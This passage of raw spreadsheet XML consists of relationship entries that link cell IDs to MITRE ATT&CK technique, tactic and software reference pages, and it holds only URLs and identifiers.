Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1007" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037/005" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/001" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/001" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1497/002" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1083" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1505/003" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/009" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/001" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/001" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071/001" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1580" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/004" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1537" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1499/002" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/012" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/003" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/003" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1608/006" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/004" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/006" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/002" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/005" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/001" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1599" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1552/004" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1140" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/001" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/008" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/009" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1534" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/008" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1567/001" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/007" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1572" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222/002" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/003" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1595/003" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1176" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1586" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/012" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/001" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1649" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1569/001" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1600/002" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134/003" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001/002" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114/001" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1588/001" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069/002" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1563/001" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1592/002" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1489" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1560" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/011" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070/002" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1578/004" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1553/005" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127/001" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1526" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1584/003" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213/001" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1585" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/006" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1498" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1542" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048/001" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1207" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087/002" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/002" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1590/003" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218/014" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1550" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1092" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1543/002" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1587" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003/006" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055/015" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1597/002" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1583/002" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1564/001" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1593/001" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1614/001" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/004" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132/001" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1484/001" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1556/006" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078/001" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1546/008" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027/006" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090/004" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1495" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1574/002" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1558/004"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attack.mitre.org/tactics/TA0040" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0043" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0006" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0010" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0004" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0011" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0009" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0002" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0003" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0007" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table4.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0008" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0005" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0001" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/tactics/TA0042" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0616" TargetMode="External"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1015" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0129" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0025" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0343" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0637" TargetMode="External"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0197" TargetMode="External"/><Relationship Id="rId531" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0183" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0041" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0171" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0431" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0332" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0349" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0053" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0190" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0274" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0659" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0359" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0097" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1030" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0136" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0672" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0045" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0503" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0260" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0192" TargetMode="External"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0451" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0090" TargetMode="External"/><Relationship Id="rId486" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0610" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0475" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0567" TargetMode="External"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0652" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0280" TargetMode="External"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0052" TargetMode="External"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0177" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0663" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0180" TargetMode="External"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0104" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0220" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0081" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0597" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0246" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0416" TargetMode="External"/><Relationship Id="rId595" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0404" TargetMode="External"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0271" TargetMode="External"/><Relationship Id="rId455" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0217" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0543" TargetMode="External"/><Relationship Id="rId620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0350" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0504" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1024" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0699" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0435" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0011" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0564" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0369" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0569" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 